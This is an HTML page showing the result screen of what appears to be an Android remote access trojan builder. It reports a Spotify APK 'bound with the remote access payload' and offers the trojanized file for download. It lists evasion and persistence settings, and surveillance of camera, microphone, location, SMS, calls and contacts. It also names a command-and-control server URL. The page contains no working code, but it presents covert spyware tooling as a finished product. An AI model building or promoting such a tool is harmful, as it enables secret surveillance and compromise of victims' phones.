<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>APK Binding Result Screenshot</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdn.replit.com/agent/bootstrap-agent-dark-theme.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" rel="stylesheet">
    <style>
        body {
            background-color: #0d1117;
            color: #c9d1d9;
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }
        .card {
            background-color: #161b22;
            border: 1px solid rgba(240, 246, 252, 0.1);
        }
        .card-header {
            border-bottom: 1px solid rgba(240, 246, 252, 0.1);
        }
        .card-header.bg-success {
            background-color: #238636 !important;
        }
        .list-group-item {
            background-color: #1b222e;
            border-color: rgba(240, 246, 252, 0.1);
        }
        /* Cyberpunk-inspired elements */
        .cyberpunk-glow {
            text-shadow: 0 0 5px #0ff, 0 0 10px #0ff, 0 0 15px #0ff;
            color: #0ff;
        }
        .card-header h2 i, .card-header h4 i, .card-header h5 i {
            color: #0ff;
        }
        .badge.bg-success {
            background-color: #00cc66 !important;
        }
    </style>
</head>
<body data-bs-theme="dark">
    <div class="container mt-4">
        <div class="row">
            <div class="col-lg-8 mx-auto">
                <div class="card">
                    <div class="card-header bg-success text-white">
                        <h2 class="mb-0"><i class="fas fa-check-circle"></i> APK Binding Successful</h2>
                    </div>
                    <div class="card-body">
                        <div class="alert alert-success">
                            <p><i class="fas fa-info-circle"></i> The APK has been successfully bound with the remote access payload.</p>
                        </div>
                        
                        <div class="row mb-4">
                            <div class="col-md-6">
                                <h4>Original APK Information</h4>
                                <ul class="list-group">
                                    <li class="list-group-item d-flex justify-content-between">
                                        <span>Package Name:</span>
                                        <strong>com.spotify.music</strong>
                                    </li>
                                    <li class="list-group-item d-flex justify-content-between">
                                        <span>Application Name:</span>
                                        <strong>Spotify Music</strong>
                                    </li>
                                </ul>
                            </div>
                            <div class="col-md-6">
                                <h4>Generated APK</h4>
                                <ul class="list-group">
                                    <li class="list-group-item d-flex justify-content-between">
                                        <span>Bound APK:</span>
                                        <strong>spotify_bound.apk</strong>
                                    </li>
                                    <li class="list-group-item">
                                        <a href="#" class="btn btn-primary btn-sm w-100">
                                            <i class="fas fa-download"></i> Download Bound APK
                                        </a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                        
                        <h4>Payload Configuration</h4>
                        <div class="row">
                            <div class="col-md-6">
                                <div class="card mb-3">
                                    <div class="card-header">
                                        <h5 class="mb-0">Security Features</h5>
                                    </div>
                                    <div class="card-body">
                                        <ul class="list-group">
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Anti-Emulator Detection:</span>
                                                <span class="badge bg-success">Enabled</span>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Hide App Icon:</span>
                                                <span class="badge bg-secondary">Disabled</span>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Persist Across Reboots:</span>
                                                <span class="badge bg-success">Enabled</span>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Anti-Deletion Protection:</span>
                                                <span class="badge bg-secondary">Disabled</span>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                            
                            <div class="col-md-6">
                                <div class="card mb-3">
                                    <div class="card-header">
                                        <h5 class="mb-0">Surveillance Features</h5>
                                    </div>
                                    <div class="card-body">
                                        <ul class="list-group">
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Camera Access:</span>
                                                <span class="badge bg-success">Enabled</span>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Microphone Access:</span>
                                                <span class="badge bg-success">Enabled</span>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Location Tracking:</span>
                                                <span class="badge bg-success">Enabled</span>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>SMS/Calls Monitoring:</span>
                                                <span class="badge bg-success">Enabled</span>
                                            </li>
                                            <li class="list-group-item d-flex justify-content-between">
                                                <span>Contacts Access:</span>
                                                <span class="badge bg-success">Enabled</span>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                        
                        <div class="mb-3">
                            <div class="alert alert-info">
                                <strong>C&C Server URL:</strong> https://rxdsec-rat.replit.app/
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>